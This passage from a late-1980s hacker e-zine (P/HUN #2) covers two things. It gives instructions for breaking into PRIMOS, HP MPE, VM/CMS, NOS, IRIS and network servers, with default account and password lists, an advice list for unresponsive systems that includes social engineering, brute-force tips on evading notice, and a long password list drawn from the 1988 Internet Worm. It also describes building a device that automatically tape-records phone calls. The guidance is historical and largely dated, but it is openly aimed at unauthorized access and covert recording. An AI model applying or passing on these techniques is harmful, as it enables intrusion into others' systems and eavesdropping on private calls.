           features of a Prime on Telenet is a facility called NETLINK.  Once

           you're inside, type NETLINK and follow the help files.  This allows

           you to connect to NUA's all over the world using the 'nc' command.

           For example, to connect to NUA 026245890040004, you would type

           @nc :26245890040004 at the netlink prompt.

           Common Accounts/Defaults:

           PRIME       PRIME or PRIMOS

           PRIMOS_CS   PRIME or PRIMOS

           PRIMENET    PRIMENET

           SYSTEM      SYSTEM or PRIME

           NETLINK     NETLINK

           TEST        TEST

           GUEST       GUEST

           GUEST1      GUEST



HP-x000-   This system is made by Hewlett-Packard.  It is characterized by the

           ':' prompt.  The HP has one of the more complicated login sequences

           around- you type 'HELLO SESSION NAME,USERNAME,ACCOUNTNAME,GROUP'.

           Fortunately, some of these fields can be left blank in many cases.

           Since any and all of these fields can be passworded, this is not

           the easiest system to get into, except for the fact that there are

           usually some unpassworded accounts around.  In general, if the

           defaults don't work, you'll have to brute force it using the

           common password list (see below.)  The HP-x000 runs the MPE operat-

           ing system, the prompt for it will be a ':', just like the logon

           prompt.

           Common Accounts/Defaults:

           MGR.TELESUP,PUB                      User: MGR Acct: HPONLY Grp: PUB

           MGR.HPOFFICE,PUB                     unpassworded

           MANAGER.ITF3000,PUB                  unpassworded

           FIELD.SUPPORT,PUB                    user: FLD,  others unpassworded

           MAIL.TELESUP,PUB                     user: MAIL, others unpassworded

           MGR.RJE                              unpassworded

           FIELD.HPPl89 ,HPPl87,HPPl89,HPPl96   unpassworded

           MGR.TELESUP,PUB,HPONLY,HP3           unpassworded





IRIS-      IRIS stands for Interactive Real Time Information System.  It orig-

           inally ran on PDP-11's, but now runs on many other minis.  You can

           spot an IRIS by the 'Welcome to "IRIS" R9.1.4 Timesharing' banner,

           and the ACCOUNT ID? prompt.  IRIS allows unlimited tries at hacking

           in, and keeps no logs of bad attempts.  I don't know any default

           passwords, so just try the common ones from the password database

           below.

           Common Accounts:

           MANAGER

           BOSS

           SOFTWARE

           DEMO

           PDP8

           PDP11

           ACCOUNTING



VM/CMS-    The VM/CMS operating system runs in International Business Machines

           (IBM) mainframes.  When you connect to one of these, you will get

           message similar to 'VM/370 ONLINE', and then give you a '.' prompt,

           just like TOPS-10 does.  To login, you type 'LOGON <username>'.

           Common Accounts/Defaults are:

           AUTOLOG1:            AUTOLOG or AUTOLOG1

           CMS:                 CMS

           CMSBATCH:            CMS or CMSBATCH

           EREP:                EREP

           MAINT:               MAINT or MAINTAIN

           OPERATNS:            OPERATNS or OPERATOR

           OPERATOR:            OPERATOR

           RSCS:                RSCS

           SMART:               SMART

           SNA:                 SNA

           VMTEST:              VMTEST

           VMUTIL:              VMUTIL

           VTAM:                VTAM



NOS-       NOS stands for Networking Operating System, and runs on the Cyber

           computer made by Control Data Corporation.  NOS identifies itself

           quite readily, with a banner of 'WELCOME TO THE NOS SOFTWARE

           SYSTEM.  COPYRIGHT CONTROL DATA 1978,1987'.  The first prompt you

           will get will be FAMILY:.  Just hit return here.  Then you'll get

           a USER NAME: prompt.  Usernames are typically 7 alpha-numerics

           characters long, and are *extremely* site dependent. Operator

           accounts begin with a digit, such as 7ETPDOC.

           Common Accounts/Defaults:

           $SYSTEM              unknown

           SYSTEMV              unknown



Decserver- This is not truly a computer system, but is a network server that

           has many different machines available from it.  A Decserver will

           say 'Enter Username>' when you first connect.  This can be anything,

           it doesn't matter, it's just an identifier.  Type 'c', as this is

           the least conspicuous thing to enter.  It will then present you

           with a 'Local>' prompt.  From here, you type 'c <systemname>' to

           connect to a system.  To get a list of system names, type

           'sh services' or 'sh nodes'.  If you have any problems, online

           help is available with the 'help' command.  Be sure and look for

           services named 'MODEM' or 'DIAL' or something similar, these are

           often outdial modems and can be useful!



GS/1-      Another type of network server.  Unlike a Decserver, you can't

           predict what prompt a GS/1 gateway is going to give you.  The

           default prompt it 'GS/1>', but this is redifinable by the

           system administrator.  To test for a GS/1, do a 'sh d'.  If that

           prints out a large list of defaults (terminal speed, prompt,

           parity, etc...), you are on a GS/1.  You connect in the same manner

           as a Decserver, typing 'c <systemname>'.  To find out what systems

           are available, do a 'sh n' or a 'sh c'.  Another trick is to do a

           'sh m', which will sometimes show you a list of macros for logging

           onto a system.  If there is a macro named VAX, for instance, type

           'do VAX'.



           The above are the main system types in use today.  There are

           hundreds of minor variants on the above, but this should be

           enough to get you started.



Unresponsive Systems

DDDDDDDDDDDDDDDDDDDD

   Occasionally you will connect to a system that will do nothing but sit

there.  This is a frustrating feeling, but a methodical approach to the system

will yield a response if you take your time.  The following list will usually

make *something* happen.

1)  Change your parity, data length, and stop bits.  A system that won't re-

    spond at 8N1 may react at 7E1 or 8E2 or 7S2.  If you don't have a term

    program that will let you set parity to EVEN, ODD, SPACE, MARK, and NONE,

    with data length of 7 or 8, and 1 or 2 stop bits, go out and buy one.

    While having a good term program isn't absolutely necessary, it sure is

    helpful.

2)  Change baud rates.  Again, if your term program will let you choose odd

    baud rates such as 600 or 1100, you will occasionally be able to penetrate

    some very interesting systems, as most systems that depend on a strange

    baud rate seem to think that this is all the security they need...

3)  Send a series of <cr>'s.

4)  Send a hard break followed by a <cr>.

5)  Type a series of .'s (periods).  The Canadian network Datapac responds

    to this.

6)  If you're getting garbage, hit an 'i'.  Tymnet responds to this, as does

    a MultiLink II.

7)  Begin sending control characters, starting with ^A --> ^Z.

8)  Change terminal emulations.  What your vt100 emulation thinks is garbage

    may all of a sudden become crystal clear using ADM-5 emulation.  This also

    relates to how good your term program is.

9)  Type LOGIN, HELLO, LOG, ATTACH, CONNECT, START, RUN, BEGIN, LOGON, GO,

    JOIN, HELP, and anything else you can think of.

10) If it's a dialin, call the numbers around it and see if a company

    answers.  If they do, try some social engineering.



Brute Force Hacking

DDDDDDDDDDDDDDDDDDD

   There will also be many occasions when the default passwords will not work

on an account.  At this point, you can either go onto the next system on your

list, or you can try to 'brute-force' your way in by trying a large database

of passwords on that one account.  Be careful, though!  This works fine on

systems that don't keep track of invalid logins, but on a system like a VMS,

someone is going to have a heart attack if they come back and see '600 Bad

Login Attempts Since Last Session' on their account.  There are also some

operating systems that disconnect after 'x' number of invalid login attempts

and refuse to allow any more attempts for one hour, or ten minutes, or some-

times until the next day.

   The following list is taken from my own password database plus the data-

base of passwords that was used in the Internet UNIX Worm that was running

around in November of 1988.  For a shorter group, try first names, computer

terms, and obvious things like 'secret', 'password', 'open', and the name

of the account.  Also try the name of the company that owns the computer

system (if known), the company initials, and things relating to the products

the company makes or deals with.



                              Password List

                              =============



      aaa                daniel             jester             rascal

      academia           danny              johnny             really

      ada                dave               joseph             rebecca

      adrian             deb                joshua             remote

      aerobics           debbie             judith             rick

      airplane           deborah            juggle             reagan

      albany             december           julia              robot

      albatross          desperate          kathleen           robotics

      albert             develop            kermit             rolex

      alex               diet               kernel             ronald

      alexander          digital            knight             rosebud

      algebra            discovery          lambda             rosemary

      alias              disney             larry              roses

      alpha              dog                lazarus            ruben

      alphabet           drought            lee                rules

      ama                duncan             leroy              ruth

      amy                easy               lewis              sal

      analog             eatme              light              saxon

      anchor             edges              lisa               scheme

      andy               edwin              louis              scott

      andrea             egghead            lynne              scotty

      animal             eileen             mac                secret

      answer             einstein           macintosh          sensor

      anything           elephant           mack               serenity

      arrow              elizabeth          maggot             sex

      arthur             ellen              magic              shark

      asshole            emerald            malcolm            sharon

      athena             engine             mark               shit

      atmosphere         engineer           markus             shiva

      bacchus            enterprise         marty              shuttle

      badass             enzyme             marvin             simon

      bailey             euclid             master             simple

      banana             evelyn             maurice            singer

      bandit             extension          merlin             single

      banks              fairway            mets               smile

      bass               felicia            michael            smiles

      batman             fender             michelle           smooch

      beauty             fermat             mike               smother

      beaver             finite             minimum            snatch

      beethoven          flower             minsky             snoopy

      beloved            foolproof          mogul              soap

      benz               football           moose              socrates

      beowulf            format             mozart             spit

      berkeley           forsythe           nancy              spring

      berlin             fourier            napoleon           subway

      beta               fred               network            success

      beverly            friend             newton             summer

      bob                frighten           next               super

      brenda             fun                olivia             support

      brian              gabriel            oracle             surfer

      bridget            garfield           orca               suzanne

      broadway           gauss              orwell             tangerine

      bumbling           george             osiris             tape

      cardinal           gertrude           outlaw             target

      carmen             gibson             oxford             taylor

      carolina           ginger             pacific            telephone

      caroline           gnu                painless           temptation

      castle             golf               pam                tiger

      cat                golfer             paper              toggle

      celtics            gorgeous           password           tomato

      change             graham             pat                toyota

      charles            gryphon            patricia           trivial

      charming           guest              penguin            unhappy

      charon             guitar             pete               unicorn

      chester            hacker             peter              unknown

      cigar              harmony            philip             urchin

      classic            harold             phoenix            utility

      coffee             harvey             pierre             vicky

      coke               heinlein           pizza              virginia

      collins            hello              plover             warren

      comrade            help               polynomial         water

      computer           herbert            praise             weenie

      condo              honey              prelude            whatnot

      condom             horse              prince             whitney

      cookie             imperial           protect            will

      cooper             include            pumpkin            william

      create             ingres             puppet             willie

      creation           innocuous          rabbit             winston

      creator            irishman           rachmaninoff       wizard

      cretin             isis               rainbow            wombat

      daemon             japan              raindrop           yosemite

      dancer             jessica            random             zap





Part Four: Wrapping it up!

DDDDDDDDDDDDDDDDDDDDDDDDDD

   I hope this file has been of some help in getting started.  If you're

asking yourself the question 'Why hack?', then you've probably wasted a lot

of time reading this, as you'll never understand.  For those of you who

have read this and found it useful, please send a tax-deductible donation

of $5.00 (or more!) in the name of the Legion of Doom to:

                                       The American Cancer Society

                                       90 Park Avenue

                                       New York, NY  10016





******************************************************************************

References:

1) Introduction to ItaPAC by Blade Runner

   Telecom Security Bulletin #1

2) The IBM VM/CMS Operating System by Lex Luthor

   The LOD/H Technical Journal #2

3) Hacking the IRIS Operating System by The Leftist

   The LOD/H Technical Journal #3

4) Hacking CDC's Cyber by Phrozen Ghost

   Phrack Inc. Newsletter #18

5) USENET comp.risks digest (various authors, various issues)

6) USENET unix.wizards forum (various authors)

7) USENET info-vax forum (various authors)



Recommended Reading:

1) Hackers by Steven Levy

2) Out of the Inner Circle by Bill Landreth

3) Turing's Man by J. David Bolter

4) Soul of a New Machine by Tracy Kidder

5) Neuromancer, Count Zero, Mona Lisa Overdrive, and Burning Chrome, all

   by William Gibson

6) Reality Hackers Magazine c/o High Frontiers, P.O. Box 40271, Berkeley,

   California, 94704, 415-995-2606

7) Any of the Phrack Inc. Newsletters & LOD/H Technical Journals you can find.



Acknowledgements:

   Thanks to my wife for putting up with me.

   Thanks to Lone Wolf for the RSTS & TOPS assistance.

   Thanks to Android Pope for proofreading, suggestions, and beer.

   Thanks to The Urvile/Necron 99 for proofreading & Cyber info.

   Thanks to Eric Bloodaxe for wading through all the trash.

   Thanks to the users of Phoenix Project for their contributions.

   Thanks to Altos Computer Systems, Munich, for the chat system.

   Thanks to the various security personel who were willing to talk to

             me about how they operate.



Boards:

   I can be reached on the following systems with some regularity-

       The Phoenix Project:    512/441-3088    300-2400 baud

       Hacker's Den88:         718/358-9209    300-1200 baud

       Smash Palace South:     512/478-6747    300-2400 baud

       Smash Palace North:     612/633-0509    300-2400 baud







=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

=                  Volume 1 , P/HUN #2 , Phile #9 of 9                        =

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



                       TELEPHONE-CONTROLLED TAPE STARTER

                       ---------------------------------

                               BY: NY HACKER

                       NEWYORK UNDERGROUND ASSOCIATION!



                    WRITTEN FOR THE P/HUN ONLINE MAGAZINE

                    :::::::::::::::::::::::::::::::::::::



BASIC ELECTRONIC KNOWLEDGE IS ASSUMED:

WHY SPEND 200$ DOLLARS ON A ANSWERING MACHINE WHILE YOU CAN SPEND JUST A DOLLAR

ON PARTS TO MAKE YOUR OWN .HAVE I CAUGHT YOUR INTREST YET?

THIS SMALL PIECE OF EQUIPMENT WILL CONVERT YOUR TAPE RECORDER INTO A FULLY

AUTOMATIC RECORDING MACHINE.THIS HAS BEEN DESIGNED IN A SUCH A WAY THAT

NO EXTERNAL POWER WILL BE NEEDED.LETS SAY SOMEONE PICKS UP THE PHONE TO DIAL

OR WHEN THERES INCOMING CALLS.THIS GADJET WILL ALLOW AUTOMATIC RECORDING TO

START BOTH WAYS AND WHEN YOU HANG UP IT STOPS.NO MODIFICATION OF THE PHONE OR

THE TAPE RECORDER IS NECCESSARY.SIMPLY CONNECT TWO WIRES TO A TELEPHONE JACK

OR ANYWHERE ELSE ACROSS YOUR TWO TELEPHONE WIRES.

THIS GADJET PLUGS IN TO THE TAPE RECORDER WHERE THE MICROPHONE USUALLY GOES.



                          HOW IT WORKS

                          ::::::::::::



                   REFER TO THE SCHEMATIC BELOW



WITH THE SWITCH TERNINALS OF YOUR TAPE RECORDER "OPEN",YOU CAN MEASURE A

VOLTAGE ACROSS THEM THAT IS EQUAL TO THE DC VOL. USED TO OPERATE THE MACHINE.

THIS IS USUALLY AROUD 6V.IF WE APPLY THIS READILY AVAILABLEVOL. TO A PAIR OF

DARLINGTON-CONNECTED TRASISTORS,Q1 AND Q2,THEY WILL TURN ON AND START THE

TAPE RECORDER. TO TURN THE TRANSISTORS OFF,AND THEREBY STOP THE MACHINE,WE

HAVE TO APPLY A NEAGATIVE VOL. TO THE BASE TO THE Q1 TRANSITOR.THIS IS DONE BY

THE VOL. FROM THE TELEPHONE LINE.

WHEN THE TELEPHONE LINE IS ON HOOK THERES 48 VOL DC.THIS WVOLTAGE IS DIVIDED

ACROSS R1,R2 AND R4 RESISTORS IN WAY THAT ALLOWS THE BASE TO Q1 TO BE NEGATIVLY

BASED THEREFORE KEEPING THE RECORDER OFF.ALSO WHEN THE PHONE IS PICKED UP

THE VOLTAGE IS ABOUT 12 VOLTS WHICH LEAVES ENOUGH WONT KEEP THE Q1 BASE

NEGATIVE TO KEEP IT CUT OFF, SO THE TAPE RECORDER STARTS.SIMPLE HUH?



                          CONSTRUCTION

                          ::::::::::::



WHAT WORKS THE BEST AS A CASING FOR THIS EQIPMENT IS A FLORECENT STARTER

HOUSING.THIS WILL FIT THE 2 TRANSISTORS,THE DIODE,4 RESISTORS AND THE COUPLING

CAPACITOR BUT THE CONTAINMENT IS UP TO YOU.

REMOVE AND DISCARD TEH STARTER ELEMENT,BUT SAVE THE BAKELITE BASE FOR USE AS

A CONVENIENT TERMINAL BOARD FOR ALL COMPONENTS.THIS BEST WAY TO DO BUILD THIS

(IF BUILDING IN A FLORECENT STARTER) IS TO USE POINT TO POINT WIRING BECAUSE

IT WILL REDUCE THE SIZE.INVERT THE BASE SO THAT THE BRASS TERMINALS ARE INSIDE

WHICH WILL MAKE WIRING EASY.THE RUBBERY MATERIAL AT THE BOTTOM WILL PROTECT THE

THE WIRES TO THE TAPRE RECORDER.THE WIRES TO THE PHONE JACK CAN DIRECTLY BE

SOLDERED TO THE TERMINAL OR WHAT I PREFER TO DO IS WHICH IS VERY CONVENIENT

IS JUST DRILL 2 HOLES IN THE COVER AND INSERT THEM.



PARTS LIST

::::::::::



R1 - 270K,1/4,10% RESISTOR

R2 - 68K,1/4,10%     "

R3 - 33K,1/4,10%     "

R4 - 1.5K,1/4,10%    "

Q1,Q2 - 2N4954 TRASISTOR (RADIO SHACK 276-2009)

D1 - 1N645 DIODE (R.S - 276-1104)

C1 - 0.22 UF,50-V DIPPED SOLID TANTALUM CAPACITOR

MISC - TELEPHONE PLUG,FLORESCENT STARTER HOUSING,WIRE,SOLDER



SCHEMATICS

::::::::::



                   +-----(R3)------+

                   |    +---+--I<--|-----(+)

                   |    |     (D1)           TO TAPE RECORDER REMOTE CONTROL

(-)------+---(R1)--|    |        |          ___ (-)  JACK

TO TEL   |         |   |/(Q1)    |         |

(+)______|       (R2)  |X_______|/(Q2)     |

     |   |--(R4)---|            |X_        |

     |  _|         |_______________|_______|

     | |

     | +-)I----+

     |  (C1)   |

     |         |

     ()        ()

       THESE GO TO THE TAPE RECORDER MICORPHONE INPUT HACK







THE TRASISTORS' B,E,C IS AS FOLLOWS

:::::::::::::::::::::::::::::::::::



           (C)

        |/

  (BASE)|X

          (EMITTER)





      INSTALLATION AND USE

      ::::::::::::::::::::



PLUG THIS GADJET INTOT HE PROPER TAPE RECORDER JACKS AND SET THE MACHINE

TO PLAYBACK.WITHOUT THE GADJET NOT CONNECTED TO THE PHONE LINE,THE TAPE

RECORDER SHOULD START.IF IT DOESNT THEN THE WIRES THAT GOTO THE TAPE R. REMOTE

ARE REVERSED.

NOW THAT THE MACHINE IS PLAYING WITH THE GADJET PLUGGED IN,CONNECT THE 2 WIRES

TO THE PHONE LINE.WITH THE PHONE ON HOOK,TAPE RECORDER SHOULD STOP.IF IT DOESNT

REVERSE 2 WIRES WHICH GO TO TEL.(TELEPHONE). O.K THE TAPE RECODER HAS STOPPED,

NOW CHECK TO SEE WEATHER THE RECODER STARTS BY LIFITING UP THE HANDSET.

TO SET UP FOR RECORDING JUST PRESS THE FOWARD AND RECORD BUTTON ON THE TAPE

RECORDER.



OTHER THINGS CAN ALSO BE DONE WITH THIS . I WILL LEAVE THAT TO YOUR IMAGINATION



I WILL WRITE AN ARTICLE ON HOW TO MAKE A TELEPHONE BUG IN P/HUN #3.

IF YOU HAVE ANY ?S I CAN BE CONTACTED AT THE HACKERS DEN88 (718)3599209



NY HACKER

NUA!







=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

       ***  [ End of P/HUN Issue #2 ** A Hackers Den88 Productions ] ***

**  [ For you Submissions to P/HUN Call The Hackers Den88 - (718)358/9209 ] **

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



.